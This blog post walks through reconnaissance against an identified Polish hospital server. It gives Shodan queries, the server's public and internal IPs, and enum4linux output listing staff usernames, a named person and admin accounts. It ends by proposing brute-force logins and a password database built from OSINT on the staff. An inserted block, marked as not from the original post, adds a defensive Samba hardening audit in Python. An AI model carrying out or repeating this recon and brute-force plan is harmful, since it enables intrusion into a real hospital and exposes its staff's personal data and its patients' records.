Every now and then you read about a health care data breach. It's no wonder this happens: IT security in hospitals is rather poor. This post will show how it happens, from the very beginning.

OSINT

First, let's choose a target on shodan.io. We are going to search for "szpital", which means hospital in Polish.

That gives 157 results. Now we eliminate hosting companies such as "ovh" or, in this example, "home.pl", and restrict the search to Poland like this:

szpital country:"PL" & !org:"home.pl webhosting farm – static allocation"

OK, now there are only 41 results, and they are really interesting: Telnet services, NetBIOS! 🙂 Let's narrow this down to NetBIOS.

szpital country:"PL" & !org:"home.pl webhosting farm – static allocation" port:"137"

Now we can select a target. We pick 188.164.151.226 because the server name is CERBER, as in Cerberus. It must be quite a hard and dangerous server to hack :). Shodan.io shows us that the server name is CERBER0 and, as an extra, that its internal IP is 172.16.0.2:

NetBIOS Response
Servername: CERBER0
MAC: 00:00:00:00:00:00
Names:
  CERBER0 <0x0>
  CERBER0 <0x3>
  CERBER0 <0x20>
  __MSBROWSE__ <0x1>
  SZPITAL <0x0>
  SZPITAL <0x1d>
  SZPITAL <0x1e>
Additional Interfaces: 172.16.0.2

What more can shodan.io tell us? That there is a share on this server called Backup, and that the server runs Samba 4.2.14 on Debian. It's getting more and more interesting:

SMB Status
Authentication: disabled
SMB Version: 1
Capabilities: raw-mode,unicode,large-files,nt-smb,rpc-remote-api,nt-status,level2-oplocks,lock-and-read,nt-find,dfs,infolevel-passthru,large-readx,large-writex,unix,extended-security

Shares
Name     Type   Comments
------------------------------------------------------------------------
print$   Disk   Printer Drivers
Backup   Disk
IPC$     IPC    IPC Service (Samba 4.2.14-Debian)

SMB Enumeration

OK, so we've got this far. Let's try something simple and just connect to this share.

As you can see, a valid username and password are required. What a bummer… 😉

Let's use enum4linux, as it's quick and gives plenty of info.

root@ohampn:~# enum4linux -v 188.164.151.226
…
Domain Name: SZPITAL
Domain Sid: (NULL SID)
…
[+] Got OS info for 188.164.151.226 from srvinfo:
CERBER0        Wk Sv PrQ Unx NT SNT Samba 4.2.14-Debian
platform_id     : 500
os version      : 6.1
server type     : 0x809a03
…
================================
| Users on 188.164.151.226 |
================================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody    Name: nobody    Desc:
index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: mariusz    Name: mariusz    Desc:
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: izap    Name:    Desc:
index: 0x4 RID: 0x3ed acb: 0x00000010 Account: kubac    Name:    Desc:
index: 0x5 RID: 0x3f2 acb: 0x00000010 Account: zelechowskip    Name: Piotr Żelechowski    Desc:
…
user:[nobody] rid:[0x1f5]
user:[mariusz] rid:[0x3e8]
user:[izap] rid:[0x3ec]
user:[kubac] rid:[0x3ed]
user:[zelechowskip] rid:[0x3f2]
…
Password Complexity: Disabled
Minimum Password Length: 5
…
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\mariusz (Local User)
S-1-22-1-1001 Unix User\konsultant (Local User)
S-1-22-1-1002 Unix User\dariuszs (Local User)
S-1-22-1-1003 Unix User\jg (Local User)
S-1-22-1-1004 Unix User\gorskim
S-1-22-1-1005 Unix User\olszakg
S-1-22-1-1006 Unix User\marcin
S-1-22-1-1007 Unix User\grzegowski
S-1-22-1-1008 Unix User\zboinska
S-1-22-1-1009 Unix User\poli1
S-1-22-1-1021 Unix User\izap
S-1-22-1-1023 Unix User\kubac
S-1-22-1-1026 Unix User\radoszewskiw
S-1-22-1-1030 Unix User\stankiewiczk
S-1-22-1-1031 Unix User\piotrs
S-1-22-1-1032 Unix User\zelechowskip
S-1-22-1-1033 Unix User\pawlukj
S-1-22-1-1034 Unix User\witanskis
…
S-1-5-21-3495312121-1951532440-972160326-1000 CERBER0\mariusz
S-1-5-21-3495312121-1951532440-972160326-1004 CERBER0\izap
S-1-5-21-3495312121-1951532440-972160326-1005 CERBER0\kubac
S-1-5-21-3495312121-1951532440-972160326-1010 CERBER0\zelechowskip

Summary 😉

So let's verify what we know.

Domain: \CERBER0

Domain: \SZPITAL

Admin users: mariusz, izap, kubac, zelechowskip

A valid list of standard users

Internal IP address: 172.16.0.2
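Every item in that summary was obtained over an anonymous SMB1 session, so the fix is on the server side. As an added example (not code from the original post), here is a small Python audit of the Samba settings that produce exactly this exposure; the two smb.conf fragments are constructed for illustration and are not the hospital's real configuration, while the parameter names (server min protocol, restrict anonymous, map to guest, hosts allow, guest ok) are standard Samba options.

```python
# Constructed smb.conf fragments (not the hospital's real config); WEAK_CONF mirrors the
# scan findings: SMB1 negotiable, null IPC$ session accepted, Backup share open to guests.
WEAK_CONF = """
[global]
   server min protocol = NT1
   map to guest = Bad User
   restrict anonymous = 0
[Backup]
   guest ok = yes
"""
HARDENED_CONF = """
[global]
   server min protocol = SMB2_02
   map to guest = Never
   restrict anonymous = 2
   hosts allow = 172.16.0.0/16
[Backup]
   guest ok = no
"""

def parse_smb_conf(text):
    # Return {section: {key: value}} with section and key names lower-cased.
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections[current] = {}
        elif current is not None and "=" in line and line[0] not in "#;":
            key, _, value = line.partition("=")
            sections[current][" ".join(key.split()).lower()] = value.strip()
    return sections

def audit_smb_conf(text):
    """List the settings that let an anonymous scanner enumerate this server."""
    conf = parse_smb_conf(text)
    g, findings = conf.get("global", {}), []
    # Samba before 4.11 defaults 'server min protocol' to NT1, i.e. SMB1.
    if g.get("server min protocol", "NT1").upper() in ("CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1"):
        findings.append("global: SMB1 negotiable; set 'server min protocol = SMB2_02'")
    if g.get("restrict anonymous", "0") != "2":
        findings.append("global: null sessions accepted; set 'restrict anonymous = 2'")
    if g.get("map to guest", "Never").lower() != "never":
        findings.append("global: failed logins become guest; set 'map to guest = Never'")
    if "hosts allow" not in g:
        findings.append("global: no 'hosts allow'; the service answers the whole Internet")
    for name, share in conf.items():
        if name != "global" and share.get("guest ok", "no").lower() in ("yes", "true", "1"):
            findings.append(f"[{name}]: 'guest ok = yes' exposes the share to the null session")
    return findings
```

Running audit_smb_conf(WEAK_CONF) returns five findings and audit_smb_conf(HARDENED_CONF) returns none; a perimeter firewall rule for 137-139/445 is still the first control, since 'hosts allow' only filters inside Samba.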

…What next?

Well, next one can start brute-forcing logins. To do so with better luck, one should check whether the usernames are connected to real people on the internet and build a password DB.

There is also an HTTP service running Apache 2.4.10 and an SSH service on a custom port…

With Apache, one can find existing user folders… like ~mariusz and ~backup…
